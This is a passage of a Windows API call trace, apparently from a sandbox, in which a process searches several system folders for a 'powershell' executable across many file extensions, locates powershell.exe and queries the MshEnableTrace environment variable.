	[0327.071] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.071] SetErrorMode (uMode=0x1) returned 0x1
	[0327.071] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.071] SetErrorMode (uMode=0x1) returned 0x1
	[0327.071] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.072] SetErrorMode (uMode=0x1) returned 0x1
	[0327.072] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.072] SetErrorMode (uMode=0x1) returned 0x1
	[0327.072] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.072] SetErrorMode (uMode=0x1) returned 0x1
	[0327.073] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.073] SetErrorMode (uMode=0x1) returned 0x1
	[0327.073] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.073] SetErrorMode (uMode=0x1) returned 0x1
	[0327.073] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.073] SetErrorMode (uMode=0x1) returned 0x1
	[0327.073] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.074] SetErrorMode (uMode=0x1) returned 0x1
	[0327.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.074] SetErrorMode (uMode=0x1) returned 0x1
	[0327.074] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.074] SetErrorMode (uMode=0x1) returned 0x1
	[0327.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.074] SetErrorMode (uMode=0x1) returned 0x1
	[0327.075] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.075] SetErrorMode (uMode=0x1) returned 0x1
	[0327.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.075] SetErrorMode (uMode=0x1) returned 0x1
	[0327.075] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.075] SetErrorMode (uMode=0x1) returned 0x1
	[0327.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.076] SetErrorMode (uMode=0x1) returned 0x1
	[0327.076] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.076] SetErrorMode (uMode=0x1) returned 0x1
	[0327.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.076] SetErrorMode (uMode=0x1) returned 0x1
	[0327.076] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.077] SetErrorMode (uMode=0x1) returned 0x1
	[0327.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.077] SetErrorMode (uMode=0x1) returned 0x1
	[0327.077] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.077] SetErrorMode (uMode=0x1) returned 0x1
	[0327.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.077] SetErrorMode (uMode=0x1) returned 0x1
	[0327.078] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.078] SetErrorMode (uMode=0x1) returned 0x1
	[0327.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.078] SetErrorMode (uMode=0x1) returned 0x1
	[0327.078] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.078] SetErrorMode (uMode=0x1) returned 0x1
	[0327.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.079] SetErrorMode (uMode=0x1) returned 0x1
	[0327.079] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.079] SetErrorMode (uMode=0x1) returned 0x1
	[0327.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.079] SetErrorMode (uMode=0x1) returned 0x1
	[0327.079] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.079] SetErrorMode (uMode=0x1) returned 0x1
	[0327.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.080] SetErrorMode (uMode=0x1) returned 0x1
	[0327.080] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.080] SetErrorMode (uMode=0x1) returned 0x1
	[0327.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.080] SetErrorMode (uMode=0x1) returned 0x1
	[0327.080] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.081] SetErrorMode (uMode=0x1) returned 0x1
	[0327.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.081] SetErrorMode (uMode=0x1) returned 0x1
	[0327.081] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.081] SetErrorMode (uMode=0x1) returned 0x1
	[0327.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.082] SetErrorMode (uMode=0x1) returned 0x1
	[0327.082] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.082] SetErrorMode (uMode=0x1) returned 0x1
	[0327.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.082] SetErrorMode (uMode=0x1) returned 0x1
	[0327.082] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.083] SetErrorMode (uMode=0x1) returned 0x1
	[0327.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.083] SetErrorMode (uMode=0x1) returned 0x1
	[0327.083] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.083] SetErrorMode (uMode=0x1) returned 0x1
	[0327.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.083] SetErrorMode (uMode=0x1) returned 0x1
	[0327.084] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.084] SetErrorMode (uMode=0x1) returned 0x1
	[0327.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.084] SetErrorMode (uMode=0x1) returned 0x1
	[0327.084] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.084] SetErrorMode (uMode=0x1) returned 0x1
	[0327.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.085] SetErrorMode (uMode=0x1) returned 0x1
	[0327.085] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.085] SetErrorMode (uMode=0x1) returned 0x1
	[0327.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.085] SetErrorMode (uMode=0x1) returned 0x1
	[0327.085] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.086] SetErrorMode (uMode=0x1) returned 0x1
	[0327.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.086] SetErrorMode (uMode=0x1) returned 0x1
	[0327.086] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.086] SetErrorMode (uMode=0x1) returned 0x1
	[0327.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.086] SetErrorMode (uMode=0x1) returned 0x1
	[0327.087] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x283860
	[0327.088] FindNextFileW (in: hFindFile=0x283860, lpFindFileData=0x1c72d9d0 | out: lpFindFileData=0x1c72d9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.088] FindClose (in: hFindFile=0x283860 | out: hFindFile=0x283860) returned 1
	[0327.088] SetErrorMode (uMode=0x1) returned 0x1
	[0328.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c72dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0328.284] SetErrorMode (uMode=0x1) returned 0x1
	[0328.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c72dcf0 | out: lpFileInformation=0x1c72dcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0328.285] SetErrorMode (uMode=0x1) returned 0x1
	[0328.759] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0328.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.759] CoTaskMemFree (pv=0x2ca610) 
	[0329.303] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0329.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.303] CoTaskMemFree (pv=0x2ca610) 
	[0329.307] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0329.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.307] CoTaskMemFree (pv=0x2ca610) 
	[0329.316] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0329.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.317] CoTaskMemFree (pv=0x2ca610) 
